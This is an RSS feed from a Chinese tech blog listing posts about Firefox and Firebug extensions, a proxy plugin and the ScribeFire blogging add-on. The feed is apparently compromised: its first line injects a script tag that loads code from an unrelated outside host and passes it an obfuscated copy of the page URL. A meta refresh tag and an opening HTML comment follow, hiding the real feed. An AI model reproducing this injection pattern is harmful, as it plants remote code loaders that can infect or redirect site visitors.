<script src='http://turnitupnow.net/?rnd=2468%2Fdeef%2Fsnigulp-xoferif%2Fgat%2Fmoc.faelyci'></script><meta http-equiv='refresh' content='0;url=http://icyleaf.com/tag/firefox-plugins/feed/'><!--<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>.::灵狼天::. &#187; FireFox-Plugins</title>
	<atom:link href="http://icyleaf.com/tag/firefox-plugins/feed/" rel="self" type="application/rss+xml" />
	<link>http://icyleaf.com</link>
	<description>icyleaf&#039;s blog - 心外无理，心外无物，心外无事</description>
	<lastBuildDate>Tue, 13 Dec 2011 02:34:45 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>加速互联网开发的 20 个 Firefox 扩展</title>
		<link>http://icyleaf.com/2008/09/speed-up-the-development-of-the-firefox-extension-20/</link>
		<comments>http://icyleaf.com/2008/09/speed-up-the-development-of-the-firefox-extension-20/#comments</comments>
		<pubDate>Wed, 10 Sep 2008 06:47:11 +0000</pubDate>
		<dc:creator>icyleaf</dc:creator>
				<category><![CDATA[Software]]></category>
		<category><![CDATA[网络开发]]></category>
		<category><![CDATA[FireFox-Plugins]]></category>

		<guid isPermaLink="false">http://icyleaf.com/?p=363</guid>
		<description><![CDATA[这个的可谓是非常全的了，比之前介绍的5个最棒的 Firefox 扩展 强百倍。 Link：20 Firefox Add-ons to Enhance your Web Development]]></description>
			<content:encoded><![CDATA[<p>这个的可谓是非常全的了，比之前介绍的<a href="http://icyleaf.com/2008/07/22/the-5-best-firebug-extensions/" target="_self">5个最棒的 Firefox 扩展</a> 强百倍。</p>
<p>Link：<a title="20 Firefox Add-ons to Enhance your Web Development" href="http://www.noupe.com/tools/20-firefox-add-ons-to-enhance-your-web-development.html">20 Firefox Add-ons to Enhance your Web Development</a></p>
]]></content:encoded>
			<wfw:commentRss>http://icyleaf.com/2008/09/speed-up-the-development-of-the-firefox-extension-20/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>推荐5个最棒的Firebug扩展</title>
		<link>http://icyleaf.com/2008/07/the-5-best-firebug-extensions/</link>
		<comments>http://icyleaf.com/2008/07/the-5-best-firebug-extensions/#comments</comments>
		<pubDate>Tue, 22 Jul 2008 02:53:30 +0000</pubDate>
		<dc:creator>icyleaf</dc:creator>
				<category><![CDATA[Software]]></category>
		<category><![CDATA[网络开发]]></category>
		<category><![CDATA[CSS]]></category>
		<category><![CDATA[firebug]]></category>
		<category><![CDATA[FireFox-Plugins]]></category>
		<category><![CDATA[JavaScript]]></category>
		<category><![CDATA[PHP]]></category>

		<guid isPermaLink="false">http://www.icyleaf.cn/?p=218</guid>
		<description><![CDATA[原文翻译自：The 5 Best Firebug Extensions 众所周知，Firefox浏览器外加Firebug插件是互联网开发的最佳平台和调试工具。与此同时，Firebug最人性化的地方还是可以再做插件扩展，下面将介绍的是WebMonkey推荐的5款最棒的Firebug扩展。（安装下面插件的之前必须先安装Firebug插件） 1. YSlow YSlow（why slow）是由Yahoo开发者团队发布的一款基于Firebug的插件，插件遵循雅虎10条网站开发的军规评测网页效率。这里推荐一篇文章《如何提高网页的效率（下篇）——Use YSlow to know why your web Slow》。 2. Firecookie Firecookie可以随时查看当前网页的所有变化的Cookies信息，同时还可以从firebug的面板设置是否接受或拒绝cookies信息，同时配合Firefox3的页面信息功能使用效果尤佳。Web Developer插件也有类似的功能。 3. FirePHP FirePHP的PHP调试信息都是通过在HTTP头里面添加“X-FirePHP-Data”信息串来标识，不会直接输出到页面上，这样也就避免对php正常输出产生影响。不过调试的时候需要加载一个FirePHP的库文件。如何使用大家可以参加这篇文章：《Debugging PHP with Firebug and FirePHP》这个也是我今天才找到的，里面的英文不是很难懂。 4. Pixel Perfect Pixel Perfect是专门为做设计的朋友准备，经过我的测试明白了它的用途，它可以添加图片到当前的页面上面，同时可以调整图片的透明度和位置，以方便调试网站的设计，我想光凭我说还是很难明白，大家看下官方的视频演示吧。 5. Rainbow Rainbow是一款使得JavaScript语法高亮的插件，因此此插件被命名为彩虹（Rainbow），默认的Javascript变量是绿色，保留字是蓝色，当然如果你不喜欢，你还可以随时更改，通过官方的颜色库可以改变，不过目前只有4种配色。 如果你对Firebug的插件有兴趣的话，可以参见Jan Odvarko列出来的Friebug的插件清单。当然，您也可以自己编写FIrebug插件。]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.webmonkey.com/blog/The_5_Best_Firebug_Extensions" target="_blank"></a><img src="http://blog.iyi.cn/start/2007/04/30/391953301_2101c534f2.jpg" alt="firebug" /><br />
原文翻译自：<a href="http://www.webmonkey.com/blog/The_5_Best_Firebug_Extensions" target="_blank">The 5 Best Firebug Extensions</a></p>
<p>众所周知，Firefox浏览器外加Firebug插件是互联网开发的最佳平台和调试工具。与此同时，Firebug最人性化的地方还是可以再做插件扩展，下面将介绍的是<a href="http://www.webmonkey.com" target="_blank">WebMonkey</a>推荐的5款最棒的Firebug扩展。（安装下面插件的之前必须先安装<a href="https://addons.mozilla.org/en-US/firefox/addon/5369" target="_self">Firebug</a>插件）<span id="more-218"></span></p>
<p><strong>1. </strong><strong><a href="http://developer.yahoo.com/yslow/" target="_blank">YSlow</a></strong><br />
<img src="http://us.i1.yimg.com/us.yimg.com/i/rt/yslow/perfview.png" alt="yslow" width="500" height="300" /></p>
<p>YSlow（why slow）是由<a title="Yahoo开发者团队" href="http://developer.yahoo.com/" target="_blank">Yahoo开发者团队</a>发布的一款基于Firebug的插件，插件遵循雅虎<a href="http://developer.yahoo.com/performance/index.html#rules" target="_self">10条网站开发的军规</a>评测网页效率。这里推荐一篇文章《<a href="http://www.cnblogs.com/JustinYoung/archive/2007/11/28/speeding-up-web-site-yslow.html" target="_blank">如何提高网页的效率（下篇）——Use YSlow to know why your web Slow</a>》。</p>
<p><strong>2. <a href="https://addons.mozilla.org/en-US/firefox/addon/6683" target="_blank">Firecookie</a></strong><br />
<img class="full" src="http://howto.wired.com/mediawiki/images/Firecookie.png" alt="Firecookie shows list of cookies in Firebug" width="500" height="128" /></p>
<p>Firecookie可以随时查看当前网页的所有变化的Cookies信息，同时还可以从firebug的面板设置是否接受或拒绝cookies信息，同时配合Firefox3的页面信息功能使用效果尤佳。<a href="https://addons.mozilla.org/firefox/addon/60" target="_self">Web Developer</a>插件也有类似的功能。</p>
<p><strong>3. <a href="https://addons.mozilla.org/en-US/firefox/addon/6149" target="_blank">FirePHP</a></strong><br />
<img class="full" src="http://howto.wired.com/mediawiki/images/Firephp.png" alt="FirePHP: PHP debugging in Firebug" /></p>
<p>FirePHP的PHP调试信息都是通过在HTTP头里面添加“X-FirePHP-Data”信息串来标识，不会直接输出到页面上，这样也就避免对php正常输出产生影响。不过调试的时候需要加载一个FirePHP的库文件。如何使用大家可以参加这篇文章：《<a title="Permanent Link: Debugging PHP with Firebug and FirePHP" href="http://www.developertutorials.com/blog/php/debugging-php-with-firebug-and-firephp-365/" target="_blank">Debugging PHP with Firebug and FirePHP</a>》这个也是我今天才找到的，里面的英文不是很难懂。</p>
<p><strong>4. <a href="https://addons.mozilla.org/en-US/firefox/addon/7943" target="_blank">Pixel Perfect</a></strong><br />
<img class="full" src="http://howto.wired.com/mediawiki/images/Pixelperfect.png" alt="Pixel Perfect help you be just that" /></p>
<p>Pixel Perfect是专门为做设计的朋友准备，经过我的测试明白了它的用途，它可以添加图片到当前的页面上面，同时可以调整图片的透明度和位置，以方便调试网站的设计，我想光凭我说还是很难明白，大家看下官方的<a href="http://www.pixelperfectplugin.com/" target="_blank">视频演示</a>吧。</p>
<p><strong>5. Rainbow</strong><br />
<img class="full" src="http://howto.wired.com/mediawiki/images/Rainbox-firebug.png" alt="Rainbow adds colors to your code" /></p>
<p>Rainbow是一款使得JavaScript语法高亮的插件，因此此插件被命名为彩虹（Rainbow），默认的Javascript变量是绿色，保留字是蓝色，当然如果你不喜欢，你还可以随时更改，通过官方的<a href="http://xrefresh.com/presets" target="_blank">颜色库</a>可以改变，不过目前只有4种配色。</p>
<p>如果你对Firebug的插件有兴趣的话，可以参见Jan Odvarko列出来的Friebug的<a href="http://www.softwareishard.com/blog/firebug/list-of-firebug-extensions/" target="_blank">插件清单</a>。当然，您也可以<a href="http://www.webmonkey.com/blog/How_to_Create_a_Firebug_Extension" target="_blank">自己编写FIrebug插件</a>。</p>
]]></content:encoded>
			<wfw:commentRss>http://icyleaf.com/2008/07/the-5-best-firebug-extensions/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>[FF插件]让你的FireFox也能上代理</title>
		<link>http://icyleaf.com/2007/10/ff-plug-in-your-firefox-can-acting-on/</link>
		<comments>http://icyleaf.com/2007/10/ff-plug-in-your-firefox-can-acting-on/#comments</comments>
		<pubDate>Thu, 25 Oct 2007 06:06:11 +0000</pubDate>
		<dc:creator>icyleaf</dc:creator>
				<category><![CDATA[Software]]></category>
		<category><![CDATA[FireFox-Plugins]]></category>

		<guid isPermaLink="false">http://www.icyleaf.cn/2007/10/24/ff%e6%8f%92%e4%bb%b6%e8%ae%a9%e4%bd%a0%e7%9a%84firefox%e4%b9%9f%e8%83%bd%e4%b8%8a%e4%bb%a3%e7%90%86/</guid>
		<description><![CDATA[这真的是FireFox的福音啊！此插件由【第五届】出品的，这是一款辅助型插件，设代理可以和设置IE代理同效果。众所周知，【第五届】仅支持IE内核的浏览器。而此插件弥补了【第五届】的的缺陷，在运行【第五届】的同时并开启此插件，就可以轻松遨游。 使用方法通过下图大家就可以看明白，实在不明白的话，下面的压缩包有详细的说明，这里不便写出来，以免&#8230; FF-Proxy-AllInOne：Download@FUY &#124; Download@FileCrunch 【第五届】可能随时都在变化，如有变化请到我的BOX下载最新版本 提示：AllInOne包含插件，说明文档，截图以及【第五届】]]></description>
			<content:encoded><![CDATA[<p>这真的是FireFox的福音啊！此插件由<strong>【第五届】</strong>出品的，这是一款辅助型插件，设代理可以和设置IE代理同效果。众所周知，<strong>【第五届】</strong>仅支持IE内核的浏览器。而此插件弥补了<strong>【第五届】</strong>的的缺陷，在运行<strong>【第五届】</strong>的同时并开启此插件，就可以轻松遨游。</p>
<p>使用方法通过下图大家就可以看明白，实在不明白的话，下面的压缩包有详细的说明，这里不便写出来，以免&#8230;</p>
<p><a target="_blank" href="http://static.zooomr.com/images/3582737_edc4056275_b.jpg"><img src="http://static.zooomr.com/images/3582737_edc4056275.jpg" /></a></p>
<p>FF-Proxy-AllInOne：<a target="_blank" href="http://www.fileupyours.com/files/132283/FF-Proxy-AllInOne.zip">Download@FUY</a> | <a target="_blank" href="http://www.fileupyours.com/files/132283/FF-Proxy-AllInOne.zip"></a><a target="_blank" href="http://www.filecrunch.com/file/~3qxuuc">Download@FileCrunch</a><br />
<strong>【第五届】可能随时都在变化，如有变化请到<a target="_blank" href="http://public.box.net/icyleaf">我的BOX</a>下载最新版本</strong></p>
<p>提示：AllInOne包含插件，说明文档，截图以及<strong>【第五届】</strong></p>
]]></content:encoded>
			<wfw:commentRss>http://icyleaf.com/2007/10/ff-plug-in-your-firefox-can-acting-on/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>FireFox插件：离线博客发布器:ScribeFire v1.4.2 Released</title>
		<link>http://icyleaf.com/2007/10/firefox-plug-ins-offline-blog-published-scribefire-v142-released/</link>
		<comments>http://icyleaf.com/2007/10/firefox-plug-ins-offline-blog-published-scribefire-v142-released/#comments</comments>
		<pubDate>Wed, 17 Oct 2007 13:46:34 +0000</pubDate>
		<dc:creator>icyleaf</dc:creator>
				<category><![CDATA[Software]]></category>
		<category><![CDATA[FireFox-Plugins]]></category>

		<guid isPermaLink="false">http://www.icyleaf.cn/2007/10/17/scribefirev-1-4-2-released/</guid>
		<description><![CDATA[ScribeFire 是FireFox的一个插件，它是一款出色的离线博客发布工具。这个插件一下又让我放弃了前天才装的Flock浏览器，ScribeFire写Blog速度快，发布Blog速度快，可以离线写，在线再发，方便一稿多投。此外，ScribeFire还具有一个更大的优势，那就是体积很小，支持多Blog选择发布。如果你用的是firefox浏览器的话，你只需点一下firefox状态栏的ScribeFire标志就可以写博客了——连客户端都不用点。 ScribeFire支持的BLOG系统 1. BSP：WordPress.com、TypePad.com、LiveJournal、Windows Live Spaces、Performancing、Jeeran 2.自建系统：WordPress、Moveable Type、Drupal、Textpattern、Roller、 MetaWeblog、Blogger 如何使用ScribeFire 1.首先从 Mozilla官方安装ScribeFire(点这里安装）。 2.安装并重启FF后在FF右下角的状态栏，你可以看到类似记事本标志的图标，点击后会出现一个编辑界面。 3.如果您的是上述自建系统的一种，直接输入你blog的网址，点击“下一步”让程序自己寻找API接口（xmlrpc.php）。稍等片刻就可以检测到你使用的是什么系统以及 xmlrpc.php的路径。 4.输入后台管理的帐户名和密码，如果正确，它会显示&#8221;Succesfull Login&#8221;并显示BLOG的站名。 5.Well Done! 假若我写的您还没有看懂的话，就算你幸运，我找到了一个视频演示：点我就看 6. 想发布日志的时候你就在类似记事本标志的图标点右键，选择你喜爱的发布方式（标签模式/窗口模式），下面就不在多说了~ 注意事项(转自我的心是FM调频） ScribeFire目前不支持缩略名功能。就是说，假如你使用wordpress，默认的是？/postid这样的格式，如果你使用了自定义网址链接的话，可能要修改wordpress的xmlrpc.php文档: $post_title = $content_struct['title']; 替换成下面的代码: $post_titlename = explode(&#8220;==&#62;&#8221;, $content_struct['title']); $post_title = $post_titlename[0]; $post_name = $post_titlename[1];]]></description>
			<content:encoded><![CDATA[<p><img src="https://addons.mozilla.org/en-US/firefox/images/addon_preview/1730/1" alt="ScribeFire" align="left" height="150" width="200" /><a href="http://www.scribefire.com/" target="_blank">ScribeFire</a> 是FireFox的一个插件，它是一款出色的离线博客发布工具。这个插件一下又让我放弃了前天才装的<a href="http://www.flock.com" target="_blank">Flock浏览器</a>，ScribeFire写Blog速度快，发布Blog速度快，可以离线写，在线再发，方便一稿多投。此外，ScribeFire还具有一个更大的优势，那就是体积很小，支持多Blog选择发布。如果你用的是firefox浏览器的话，你只需点一下firefox状态栏的ScribeFire标志就可以写博客了——连客户端都不用点。</p>
<p><strong> ScribeFire支持的BLOG系统</strong><br />
1. BSP：WordPress.com、TypePad.com、LiveJournal、Windows Live Spaces、Performancing、Jeeran<br />
2.自建系统：WordPress、Moveable Type、Drupal、Textpattern、Roller、 MetaWeblog、Blogger</p>
<p><strong>如何使用ScribeFire</strong><br />
1.首先从 Mozilla官方安装ScribeFire(点<a href="https://addons.mozilla.org/en-US/firefox/addon/1730" target="_blank">这里</a>安装）。<br />
2.安装并重启FF后在FF右下角的状态栏，你可以看到类似记事本标志的图标，点击后会出现一个编辑界面。<br />
3.如果您的是上述自建系统的一种，直接输入你blog的网址，点击“下一步”让程序自己寻找API接口（xmlrpc.php）。稍等片刻就可以检测到你使用的是什么系统以及 xmlrpc.php的路径。<br />
4.输入后台管理的帐户名和密码，如果正确，它会显示&#8221;Succesfull Login&#8221;并显示BLOG的站名。<br />
5.Well Done!<br />
假若我写的您还没有看懂的话，就算你幸运，我找到了一个视频演示：<a href="http://www.56.com/p43/v_MjIxMjMyMzI.html" target="_blank">点我就看</a></p>
<p>6. 想发布日志的时候你就在类似记事本标志的图标点右键，选择你喜爱的发布方式（标签模式/窗口模式），下面就不在多说了~</p>
<p><strong>注意事项</strong>(转自<a href="http://oltra.cn/">我的心是FM调频</a>）<br />
ScribeFire目前不支持缩略名功能。就是说，假如你使用wordpress，默认的是？/postid这样的格式，如果你使用了自定义网址链接的话，可能要修改wordpress的xmlrpc.php文档:</p>
<p><strong>$post_title = $content_struct['title'];</strong></p>
<p>替换成下面的代码:</p>
<p><strong>$post_titlename = explode(&#8220;==&gt;&#8221;, $content_struct['title']);<br />
$post_title = $post_titlename[0];<br />
$post_name = $post_titlename[1];</strong></p>
]]></content:encoded>
			<wfw:commentRss>http://icyleaf.com/2007/10/firefox-plug-ins-offline-blog-published-scribefire-v142-released/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>

